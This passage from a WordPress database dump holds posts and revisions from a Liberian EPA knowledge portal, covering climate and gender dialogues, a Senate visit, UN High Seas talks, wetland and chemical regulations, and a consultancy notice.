remarks on behalf of Minister Gbeme Horace Kollie.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He thanked the EPA for always ensuring that gender issues are included in national programs. He said the workshop is very important because climate change and environmental degradation are increasing women’s and girls’ unpaid care and domestic work.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He reminded participants that the climate crisis does not affect everyone equally. According to him, women and girls are highly dependent on natural resources for food, water, and firewood, making them more vulnerable to climate shocks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Climate policy that ignores gender equality is not only unjust, it is ineffective,” Hon. Dorley said. “Women and girls are on the frontlines of climate change and must be part of the solutions.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He also repeated recommendations he made during the NDC 3.0 development process in 2025. These include introducing climate change education into school curriculum at all levels, providing scholarships for women and girls in natural resource management, offering economic empowerment training for rural and urban women, and creating specialized training opportunities for persons with disabilities, including albino groups.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He further called for better access to climate information in local languages and stronger gender-responsive social protection systems.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Encouraging open participation, he told attendees, “Speak now or forever hold your peace. This is the time to shape policies that will affect our people.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Representing Grand Bassa County Superintendent Karyou Johnson, Mr. Zuu Menyon welcomed participants to Buchanan and thanked the organizers for selecting the county to host the dialogue.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said Grand Bassa, as one of Liberia’s historic counties, is ready to support national climate efforts. He noted that climate change is already affecting communities in the county, especially coastal areas where flooding and erosion are serious concerns.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Our people are feeling the impact,” he said. “We must work together to ensure that the decisions made here bring real benefits to women, youth, and families.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The dialogue continues as stakeholders seek to strengthen Liberia’s climate response while promoting gender equality and building an inclusive green economy.</p>\n<!-- /wp:paragraph -->','EPA, Partners Launch National Dialogue on Care and Climate in Buchanan','','inherit','closed','closed','','5821-revision-v1','','','2026-03-10 09:07:38','2026-03-10 09:07:38','',5821,'https://ekmsliberia.info/?p=5823',0,'revision','',0),(5825,38,'2026-03-17 12:18:56','2026-03-17 12:18:56','','Final Validated (Wetlands Regulation 2024) (1)','','inherit','open','closed','','final-validated-wetlands-regulation-2024-1','','','2026-03-17 12:18:56','2026-03-17 12:18:56','',5824,'https://ekmsliberia.info/wp-content/uploads/2026/03/Final-Validated-Wetlands-Regulation-2024-1.pdf',0,'attachment','application/pdf',0),(5826,38,'2026-03-17 12:19:20','2026-03-17 12:19:20','','Screenshot 2026-03-17 at 12.16.10','','inherit','open','closed','','screenshot-2026-03-17-at-12-16-10','','','2026-03-17 12:19:20','2026-03-17 12:19:20','',5824,'https://ekmsliberia.info/wp-content/uploads/2026/03/Screenshot-2026-03-17-at-12.16.10.png',0,'attachment','image/png',0),(5827,38,'2026-03-17 12:22:23','2026-03-17 12:22:23','<strong>INTRODUCTION </strong>\r\n\r\nLiberia contains wetlands that provide basic ecosystem services and offer a wide range of functions that benefit primary industries such as forestry, fisheries, agriculture and ecotourism that are essential for the livelihood of human beings and sustenance of other living things. The coming into being of the Environmental Protection Agency (EPA) created the opportunity to prepare a National Wetlands Policy in 2014 based on the National Environmental Policy of Liberia and the Environmental Management Act. The EPA Act promulgates a framework legislation, which provides the mandate of these standards, guidelines and procedures for wetland protection, based on the National Wetlands Policy to ensure sustainable management of wetland resources and the environment in Liberia. The Environmental Protection Agency of Liberia is the custodian of quality assurance of Liberia’s wetlands resources. Part of its responsibilities is to ensure that the quality of Liberia’s wetland resources remains fit for sustainable use and that the livelihood of both human and the ecosystems are maintained and protected. These aspirations are achieved through effective management of wetland resources.\r\n\r\nThe establishment of a regulatory instrument is a first step towards a transformative progress in achieving the goals of improving access, management and sustainable use of wetlands in Liberia. This regulatory instrument is consistent with Part VI Sections 74 and 75 of the Environment Protection and Management Law of Liberia 2003.','WETLANDS MANAGEMENT REGULATIONS, 2024','','inherit','closed','closed','','5824-revision-v1','','','2026-03-17 12:22:23','2026-03-17 12:22:23','',5824,'https://ekmsliberia.info/?p=5827',0,'revision','',0),(5828,38,'2026-03-17 12:43:46','2026-03-17 12:43:46','<strong>BACKGROUND </strong>\r\n\r\nAs part of its mandate under Part II Section 6 of the Environmental Protection Agency Act and Part IV Section 49 of the Environmental Protection and Management Law of Liberia, the EPA formulates these guidelines for subsequent promulgation. These guidelines are intended for person(s), companies and other stake holders involved in any act of importation, handling, transportation and storage of chemicals (agrochemicals, explosives, laboratory, industrial chemicals, petrochemicals and additives) into Liberia. These guidelines are for obtaining license to import, handle, transport and store chemicals in Liberia. These guidelines prohibit the importation of chemicals restricted under international conventions to which Liberia is a state party.','GUIDELINES FOR THE IMPORTATION, HANDLING, TRANSPORTATION AND STORAGE OF CHEMICALS IN LIBERIA','','publish','closed','closed','','guidelines-for-the-importation-handling-transportation-and-storage-of-chemicals-in-liberia','','','2026-03-18 11:58:35','2026-03-18 11:58:35','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5828',9,'document','',0),(5829,38,'2026-03-17 12:40:40','2026-03-17 12:40:40','','Final Revised Chemical guidelines of Liberia 2024 (1)','','inherit','open','closed','','final-revised-chemical-guidelines-of-liberia-2024-1','','','2026-03-17 12:40:40','2026-03-17 12:40:40','',5828,'https://ekmsliberia.info/wp-content/uploads/2026/03/Final-Revised-Chemical-guidelines-of-Liberia-2024-1.pdf',0,'attachment','application/pdf',0),(5830,38,'2026-03-17 12:42:07','2026-03-17 12:42:07','','Screenshot 2026-03-17 at 12.40.06','','inherit','open','closed','','screenshot-2026-03-17-at-12-40-06','','','2026-03-17 12:42:07','2026-03-17 12:42:07','',5828,'https://ekmsliberia.info/wp-content/uploads/2026/03/Screenshot-2026-03-17-at-12.40.06.png',0,'attachment','image/png',0),(5831,38,'2026-03-17 12:43:46','2026-03-17 12:43:46','<strong>BACKGROUND </strong>\r\n\r\nAs part of its mandate under Part II Section 6 of the Environmental Protection Agency Act and Part IV Section 49 of the Environmental Protection and Management Law of Liberia, the EPA formulates these guidelines for subsequent promulgation. These guidelines are intended for person(s), companies and other stake holders involved in any act of importation, handling, transportation and storage of chemicals (agrochemicals, explosives, laboratory, industrial chemicals, petrochemicals and additives) into Liberia. These guidelines are for obtaining license to import, handle, transport and store chemicals in Liberia. These guidelines prohibit the importation of chemicals restricted under international conventions to which Liberia is a state party.','GUIDELINES FOR THE IMPORTATION, HANDLING, TRANSPORTATION AND STORAGE OF CHEMICALS IN LIBERIA','','inherit','closed','closed','','5828-revision-v1','','','2026-03-17 12:43:46','2026-03-17 12:43:46','',5828,'https://ekmsliberia.info/?p=5831',0,'revision','',0),(5833,38,'2026-03-24 08:08:06','2026-03-24 08:08:06','<h3 class=\"elementor-heading-title elementor-size-default\">List of Environmental Protection Agency (EPA) Certified Waste Service Provider Firms For Calendar Year; 1st October - 2025, To 30th September 2026</h3>','LIST OF EPA CERTIFIED WASTE SERVICE PROVIDERS','','publish','closed','closed','','list-of-epa-certified-waste-service-providers','','','2026-03-24 08:08:06','2026-03-24 08:08:06','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5833',8,'document','',0),(5834,38,'2026-03-19 10:55:41','2026-03-19 10:55:41','','Screenshot 2026-03-19 at 10.53.29','','inherit','open','closed','','screenshot-2026-03-19-at-10-53-29','','','2026-03-19 10:55:41','2026-03-19 10:55:41','',5833,'https://ekmsliberia.info/wp-content/uploads/2026/03/Screenshot-2026-03-19-at-10.53.29.png',0,'attachment','image/png',0),(5835,38,'2026-03-24 07:53:47','0000-00-00 00:00:00','','','','draft','closed','closed','','','','','2026-03-24 07:53:47','2026-03-24 07:53:47','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5835',7,'document','',0),(5836,38,'2026-03-24 08:04:38','2026-03-24 08:04:38','','Screenshot 2026-03-19 at 10.53.29','','inherit','open','closed','','screenshot-2026-03-19-at-10-53-29-2','','','2026-03-24 08:04:38','2026-03-24 08:04:38','',5833,'https://ekmsliberia.info/wp-content/uploads/2026/03/Screenshot-2026-03-19-at-10.53.29-1.png',0,'attachment','image/png',0),(5837,38,'2026-03-24 08:06:59','2026-03-24 08:06:59','','Waste Service Providers List','','inherit','open','closed','','waste-service-providers-list','','','2026-03-24 08:06:59','2026-03-24 08:06:59','',5833,'https://ekmsliberia.info/wp-content/uploads/2026/03/Waste-Service-Providers-List.pdf',0,'attachment','application/pdf',0),(5838,38,'2026-03-24 08:08:06','2026-03-24 08:08:06','<h3 class=\"elementor-heading-title elementor-size-default\">List of Environmental Protection Agency (EPA) Certified Waste Service Provider Firms For Calendar Year; 1st October - 2025, To 30th September 2026</h3>','LIST OF EPA CERTIFIED WASTE SERVICE PROVIDERS','','inherit','closed','closed','','5833-revision-v1','','','2026-03-24 08:08:06','2026-03-24 08:08:06','',5833,'https://ekmsliberia.info/?p=5838',0,'revision','',0),(5859,38,'2026-04-16 11:13:14','2026-04-16 11:13:14','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency (EPA) of Liberia yesterday welcomed the Honorable Pro Tempore of the Liberian Senate, Nyonblee Karnga-Lawrence, for a high-level visit aimed at strengthening collaboration between the Legislature and the country’s lead environmental institution.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":5860,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2026/04/news-today-1024x768.jpeg\" alt=\"\" class=\"wp-image-5860\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>During the briefing, the Executive Director provided a comprehensive overview of the EPA’s major achievements in 2025.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Notably, the agency completed the decentralization of EPA operations to all 15 counties, significantly enhancing environmental monitoring and compliance nationwide.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA also mobilized approximately USD 10 million in climate finance to support agriculture value chains and resilience under the ARREST Agenda. Progress was reported on critical coastal defense projects in West Point and Greenville, Sinoe County, alongside continued efforts to document county action plans for Liberia’s 15 counties.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Director emphasized strengthened enforcement actions, noting that holding polluters accountable has directly contributed to safeguarding environmental protection, public health, and saving lives. Important regulatory strides were highlighted, including the introduction of Net-Metering and Noise Pollution regulations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Looking ahead to 2026, the EPA outlined its priorities, including the construction of new EPA offices in five counties, expansion of the climate finance pipeline, and intensified enforcement of the Environmental Protection and Management Law (EPML).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The briefing also acknowledged challenges, such as the rapid rise in excavator use contributing to forest degradation from unregulated mining, the illegal importation of hazardous chemicals like cyanide, ongoing wetland degradation, and persistent budgetary constraints.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In response, the Agency called for increased Senate support through legislative reforms, enhanced budget allocations, and the approval of a USD 400,000 supplementary budget for wetland protection equipment, along with broader job creation strategies linked to environmental management.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As part of the visit, the Senate Pro Tempore toured the EPA’s state-of-the-art environmental laboratory. The Director of Environmental Research and Radiation Services (ERRS), Mr. Rafael Ngumbu, provided a detailed overview of the facility’s capabilities, which include advanced testing of soil, water, and air quality to support pollution control, environmental compliance, and public health protection. The laboratory also plays a critical role in chemical analysis, environmental forensics, climate-related research, and emerging areas such as blue carbon assessment and natural capital accounting. It supports national and international reporting obligations, early warning systems, and evidence-based policymaking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In her remarks, the Senate Pro Tempore expressed strong appreciation for the EPA’s work and leadership in environmental protection and climate action. She reaffirmed the Senate’s commitment to working closely with the EPA to ensure a safe and sustainable environment for all Liberians and pledged to organize a broader visit by members of Senate leadership to gain deeper insight into the Agency’s work and impact.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Ultimately, the visit marks an important step in reinforcing legislative–executive collaboration to advance Liberia’s environmental governance, climate resilience, and sustainable development agenda.</p>\n<!-- /wp:paragraph -->','EPA Hosts Senate Pro Tempore Nyonblee Karnga-Lawrence for High-Level Visit Monrovia, Liberia – April 15, 2026','','publish','open','open','','epa-hosts-senate-pro-tempore-nyonblee-karnga-lawrence-for-high-level-visit-monrovia-liberia-april-15-2026','','','2026-04-16 11:13:17','2026-04-16 11:13:17','',0,'https://ekmsliberia.info/?p=5859',20,'post','',0),(5840,38,'2026-03-24 19:14:49','2026-03-24 19:14:49','<div class=\"page\" title=\"Page 1\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Background</strong>\r\n\r\nThe Government of Liberia, through the Ministry of Commerce and Industry (MoCI) is implementing the Liberia Investment, Finance and Trade (LIFT) Project (P171997) with financing from the International Development Association (IDA) of the World Bank Group ($40 million). This project was developed to support the government’s strategic objectives to promote private sector development. Accordingly, the project development objective is to improve the investmentclimate, expand sustainable access to finance, and increase the efficiency of trade in Liberia. Achieving this objective requires support for improving SME’s capabilities for accessing finance and new market opportunities, to contribute to economic growth, competitiveness, and job creation. The project implementation is being coordinated by the Project Implementation Unit, under a Project Steering Committee chaired by the Minister of Commerce and Industry of the Republic of Liberia, and co-chaired by the Governor of the Central Bank of Liberia (CBL).\r\n\r\n<strong>Key Objectives of the Assignment</strong>\r\n\r\nThe objective of this consultancy is to design, develop, and deploy a secured, integrated, scalable, and user-friendly digital ESIA platform within six months. This platform is intended to enable the EPA to manage all stages of its ESIA permitting and other internal licensing processes, from licensing application and document submissions to evaluation, approval, and license issuance. The platform design shall aid monitoring and compliance tracking, ensuring alignment with legal obligations and user accessibility.\r\n\r\n</div>\r\n</div>\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/03/REOI-Automation-of-ESIA-Process.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>\r\n<div class=\"layoutArea\">\r\n<div class=\"column\"></div>\r\n</div>\r\n</div>\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>','REQUEST FOR EXPRESSION OF INTEREST (REOI) (CONSULTING   SERVICES – FIRM SELECTION) Firm to Automate the Environmental and Social Impact Assessment (ESIA) Process of the Environmental Protection Agency of Liberia, LR-MOCI-538872-CS-QCBS','','publish','closed','closed','','request-for-expression-of-interest-reoi-consulting-services-firm-selection-firm-to-automate-the-environmental-and-social-impact-assessment-esia-process-of-the-environmental-protectio','','','2026-03-24 19:14:49','2026-03-24 19:14:49','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5840',9,'ekms_bulletin','',0),(5841,38,'2026-03-24 19:10:04','2026-03-24 19:10:04','<div class=\"page\" title=\"Page 1\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n&nbsp;\r\n\r\nThe Government of Liberia, through the Ministry of Commerce and Industry (MoCI) is implementing the Liberia Investment, Finance and Trade (LIFT) Project (P171997) with financing from the International Development Association (IDA) of the World Bank Group ($40 million). This project was developed to support the government’s strategic objectives to promote private sector development. Accordingly, the project development objective is to improve the investmentclimate, expand sustainable access to finance, and increase the efficiency of trade in Liberia. Achieving this objective requires support for improving SME’s capabilities for accessing finance and new market opportunities, to contribute to economic growth, competitiveness, and job creation. The project implementation is being coordinated by the Project Implementation Unit, under a Project Steering Committee chaired by the Minister of Commerce and Industry of the Republic of Liberia, and co-chaired by the Governor of the Central Bank of Liberia (CBL).\r\n\r\nKey Objectives of the Assignment\r\n\r\nThe objective of this consultancy is to design, develop, and deploy a secured, integrated, scalable, and user-friendly digital ESIA platform within six months. This platform is intended to enable the EPA to manage all stages of its ESIA permitting and other internal licensing processes, from licensing application and document submissions to evaluation, approval, and license issuance. The platform design shall aid monitoring and compliance tracking, ensuring alignment with legal obligations and user accessibility.\r\n\r\n</div>\r\n</div>\r\nClick to:\r\n<div class=\"layoutArea\">\r\n<div class=\"column\"></div>\r\n</div>\r\n</div>\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>','REQUEST FOR EXPRESSION OF INTEREST (REOI) (CONSULTING   SERVICES – FIRM SELECTION) Firm to Automate the Environmental and Social Impact Assessment (ESIA) Process of the Environmental Protection Agency of Liberia, LR-MOCI-538872-CS-QCBS','','inherit','closed','closed','','5840-revision-v1','','','2026-03-24 19:10:04','2026-03-24 19:10:04','',5840,'https://ekmsliberia.info/?p=5841',0,'revision','',0),(5842,38,'2026-03-24 19:13:05','2026-03-24 19:13:05','','REOI- Automation of ESIA Process','','inherit','open','closed','','reoi-automation-of-esia-process','','','2026-03-24 19:13:05','2026-03-24 19:13:05','',0,'https://ekmsliberia.info/wp-content/uploads/2026/03/REOI-Automation-of-ESIA-Process.pdf',0,'attachment','application/pdf',0),(5843,38,'2026-03-24 19:14:49','2026-03-24 19:14:49','<div class=\"page\" title=\"Page 1\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Background</strong>\r\n\r\nThe Government of Liberia, through the Ministry of Commerce and Industry (MoCI) is implementing the Liberia Investment, Finance and Trade (LIFT) Project (P171997) with financing from the International Development Association (IDA) of the World Bank Group ($40 million). This project was developed to support the government’s strategic objectives to promote private sector development. Accordingly, the project development objective is to improve the investmentclimate, expand sustainable access to finance, and increase the efficiency of trade in Liberia. Achieving this objective requires support for improving SME’s capabilities for accessing finance and new market opportunities, to contribute to economic growth, competitiveness, and job creation. The project implementation is being coordinated by the Project Implementation Unit, under a Project Steering Committee chaired by the Minister of Commerce and Industry of the Republic of Liberia, and co-chaired by the Governor of the Central Bank of Liberia (CBL).\r\n\r\n<strong>Key Objectives of the Assignment</strong>\r\n\r\nThe objective of this consultancy is to design, develop, and deploy a secured, integrated, scalable, and user-friendly digital ESIA platform within six months. This platform is intended to enable the EPA to manage all stages of its ESIA permitting and other internal licensing processes, from licensing application and document submissions to evaluation, approval, and license issuance. The platform design shall aid monitoring and compliance tracking, ensuring alignment with legal obligations and user accessibility.\r\n\r\n</div>\r\n</div>\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/03/REOI-Automation-of-ESIA-Process.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>\r\n<div class=\"layoutArea\">\r\n<div class=\"column\"></div>\r\n</div>\r\n</div>\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>','REQUEST FOR EXPRESSION OF INTEREST (REOI) (CONSULTING   SERVICES – FIRM SELECTION) Firm to Automate the Environmental and Social Impact Assessment (ESIA) Process of the Environmental Protection Agency of Liberia, LR-MOCI-538872-CS-QCBS','','inherit','closed','closed','','5840-revision-v1','','','2026-03-24 19:14:49','2026-03-24 19:14:49','',5840,'https://ekmsliberia.info/?p=5843',0,'revision','',0),(5845,38,'2026-03-27 01:36:26','2026-03-27 01:36:26','','today news','','inherit','open','closed','','today-news-3','','','2026-03-27 01:36:26','2026-03-27 01:36:26','',5844,'https://ekmsliberia.info/wp-content/uploads/2026/03/today-news.jpeg',0,'attachment','image/jpeg',0),(5846,38,'2026-03-27 01:40:41','2026-03-27 01:40:41','<!-- wp:paragraph -->\n<p>At the United Nations Headquarters, Liberia has warned that climate change is no longer just an environmental issue but a serious threat to peace and security.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Delivering Liberia’s national statement on March 26, 2026, the Executive Director of the Environmental Protection Agency, Dr. Emmanuel K. Urey Yarkpawolo, told members of the Group of Friends on Climate &amp; Security that the country is already feeling the impact.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said rising sea levels and strong coastal erosion are forcing many people from their homes. According to him, this situation is affecting livelihoods and creating tension in communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“This is not only an environmental problem. It is now a human security issue,” Dr. Yarkpawolo said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He explained that people who lose their homes and land often move to other areas, leading to disputes over land and resources. These tensions, he noted, can grow into bigger conflicts if not handled well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo also spoke about the wider region, especially the Sahel, where long dry seasons and poor farming conditions are pushing young men to move south in search of better life. He named countries like Burkina Faso as places where many migrants are coming from.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said some of these migrants are entering forest areas in Liberia to farm crops like cocoa. While this helps them survive, it is putting more pressure on land and forests and sometimes causes problems with local communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The risk of conflict is growing quietly,” he warned.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Despite the challenges, the EPA boss said Liberia is working to address the problem. He spoke about programs that are helping young people find jobs while protecting the environment. These include eco-brigades, mangrove restoration, and community peace efforts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said these actions are helping to reduce tension and build trust among people.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia is also trying to connect climate work with peacebuilding. Dr. Yarkpawolo said projects on the coast now include building protection, restoring nature, and supporting local people at the same time.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He called on the international community to support countries like Liberia with funding and technical help. He said climate finance and strong partnerships are needed to prevent future conflicts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We cannot talk about climate change without talking about security,” he said. “And we cannot have peace without dealing with climate problems.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo added that Liberia is ready to work with partners to turn climate challenges into opportunities for peace and development.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','\"Climate Crisis Becoming Security Threat in Liberia\"…Director Yarkpawolo tells UN','','inherit','closed','closed','','5844-revision-v1','','','2026-03-27 01:40:41','2026-03-27 01:40:41','',5844,'https://ekmsliberia.info/?p=5846',0,'revision','',0),(5847,38,'2026-03-26 01:47:01','2026-03-26 01:47:01','<!-- wp:paragraph -->\n<p>New York, March 23, 2026 — The Government of Liberia is strengthening its voice on the global stage, with the Environmental Protection Agency (EPA) leading the country’s participation in key United Nations negotiations on the High Seas Treaty.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Leading the Liberian delegation is EPA Executive Director, Dr. Emmanuel K. Urey Yarkpawolo, who is representing the country at the Third Preparatory Commission (PrepCom III) of the Biodiversity Beyond National Jurisdiction (BBNJ) Agreement. The meeting, taking place from March 23 to April 2, 2026, marks a critical step toward operationalizing the High Seas Treaty.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia’s participation underscores the Government’s strong commitment to environmental protection, climate action, and international cooperation. The New York discussions are focused on establishing key systems that will guide how the agreement is implemented globally, including governance structures, financing mechanisms, and technical frameworks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo is joined by a team of experienced professionals, including Mr. Jestino Sharty Gaye of Liberia’s Permanent Mission in New York, Mr. Bohmensahn Yuan of the Liberia Maritime Authority, Mr. Joseph Charles of the EPA, among others, reflects a coordinated national approach to advancing Liberia’s interests on the global stage.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The ongoing negotiations are addressing critical areas such as the creation of marine protected areas, environmental impact assessments, data-sharing systems, and equitable access to benefits derived from marine genetic resources. These discussions are expected to shape how countries collaborate to protect biodiversity in areas beyond national jurisdiction.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For Liberia, the BBNJ Agreement presents significant opportunities. The process opens doors to increased access to international climate finance, technical support, and scientific collaboration, particularly in ocean research, marine resource management, and blue economy development.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Government of Liberia views this engagement as a strategic opportunity to strengthen national capacity, attract investment, and ensure that the country benefits from emerging global systems tied to ocean resources.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At the same time, Liberia’s active participation demonstrates its commitment to ensuring that the voices and interests of developing countries are well represented in global decision-making processes.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As the world moves toward implementing the High Seas Treaty, Liberia remains focused on aligning its national priorities with international frameworks, promoting sustainable development, and safeguarding its natural resources for present and future generations.</p>\n<!-- /wp:paragraph -->','EPA Boss Leads Liberia in Crucial UN High Seas Negotiations','','publish','open','open','','epa-boss-leads-liberia-in-crucial-un-high-seas-negotiations','','','2026-03-27 01:51:25','2026-03-27 01:51:25','',0,'https://ekmsliberia.info/?p=5847',21,'post','',0),(5848,38,'2026-03-27 01:49:14','2026-03-27 01:49:14','','yesterday news','','inherit','open','closed','','yesterday-news','','','2026-03-27 01:49:14','2026-03-27 01:49:14','',5847,'https://ekmsliberia.info/wp-content/uploads/2026/03/yesterday-news.jpeg',0,'attachment','image/jpeg',0),(5849,38,'2026-03-27 01:51:23','2026-03-27 01:51:23','<!-- wp:paragraph -->\n<p>New York, March 23, 2026 — The Government of Liberia is strengthening its voice on the global stage, with the Environmental Protection Agency (EPA) leading the country’s participation in key United Nations negotiations on the High Seas Treaty.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Leading the Liberian delegation is EPA Executive Director, Dr. Emmanuel K. Urey Yarkpawolo, who is representing the country at the Third Preparatory Commission (PrepCom III) of the Biodiversity Beyond National Jurisdiction (BBNJ) Agreement. The meeting, taking place from March 23 to April 2, 2026, marks a critical step toward operationalizing the High Seas Treaty.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia’s participation underscores the Government’s strong commitment to environmental protection, climate action, and international cooperation. The New York discussions are focused on establishing key systems that will guide how the agreement is implemented globally, including governance structures, financing mechanisms, and technical frameworks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo is joined by a team of experienced professionals, including Mr. Jestino Sharty Gaye of Liberia’s Permanent Mission in New York, Mr. Bohmensahn Yuan of the Liberia Maritime Authority, Mr. Joseph Charles of the EPA, among others, reflects a coordinated national approach to advancing Liberia’s interests on the global stage.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The ongoing negotiations are addressing critical areas such as the creation of marine protected areas, environmental impact assessments, data-sharing systems, and equitable access to benefits derived from marine genetic resources. These discussions are expected to shape how countries collaborate to protect biodiversity in areas beyond national jurisdiction.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For Liberia, the BBNJ Agreement presents significant opportunities. The process opens doors to increased access to international climate finance, technical support, and scientific collaboration, particularly in ocean research, marine resource management, and blue economy development.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Government of Liberia views this engagement as a strategic opportunity to strengthen national capacity, attract investment, and ensure that the country benefits from emerging global systems tied to ocean resources.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At the same time, Liberia’s active participation demonstrates its commitment to ensuring that the voices and interests of developing countries are well represented in global decision-making processes.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As the world moves toward implementing the High Seas Treaty, Liberia remains focused on aligning its national priorities with international frameworks, promoting sustainable development, and safeguarding its natural resources for present and future generations.</p>\n<!-- /wp:paragraph -->','EPA Boss Leads Liberia in Crucial UN High Seas Negotiations','','inherit','closed','closed','','5847-revision-v1','','','2026-03-27 01:51:23','2026-03-27 01:51:23','',5847,'https://ekmsliberia.info/?p=5849',0,'revision','',0),(5850,38,'2026-03-27 14:30:02','2026-03-27 14:30:02','','Economics and Markets Expert 27','','inherit','open','closed','','economics-and-markets-expert-27','','','2026-03-27 14:30:02','2026-03-27 14:30:02','',0,'https://ekmsliberia.info/wp-content/uploads/2026/03/Economics-and-Markets-Expert-27.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5851,38,'2026-03-27 14:30:43','2026-03-27 14:30:43','<strong>Project Background</strong>\r\n\r\nThe proposed 36-month regional project, led by UNEP under the Global Biodiversity Framework Fund (GBFF), aims to mainstream biodiversity conservation into productive sectors by addressing unsustainable sand extraction in Liberia and The Gambia. Recognizing sand mining as a major driver of coastal erosion, habitat loss, pollution, and biodiversity decline in the West African marine ecoregion, the project adopts a source-to-sea approach to strengthen policy and regulatory frameworks, enhance institutional and technical capacity, promote nature-based solutions, and foster market transformation along the sand value chain. Through baseline assessments, regional knowledge-sharing platforms, regulatory reform, private sector engagement, and support for women, youth, and Indigenous Peoples and Local Communities to transition toward biodiversity-friendly livelihoods, the project seeks to reduce ecological degradation while promoting sustainable economic resilience. With a total GEF financing envelope of approximately USD 4.9 million, the initiative aligns with national biodiversity strategies and GBF Action Areas 3 and 6 to integrate biodiversity safeguards into governance, markets, and investment decisions across the region.\r\n\r\nThe project (GEFID 12029), to be executed by the Environmental 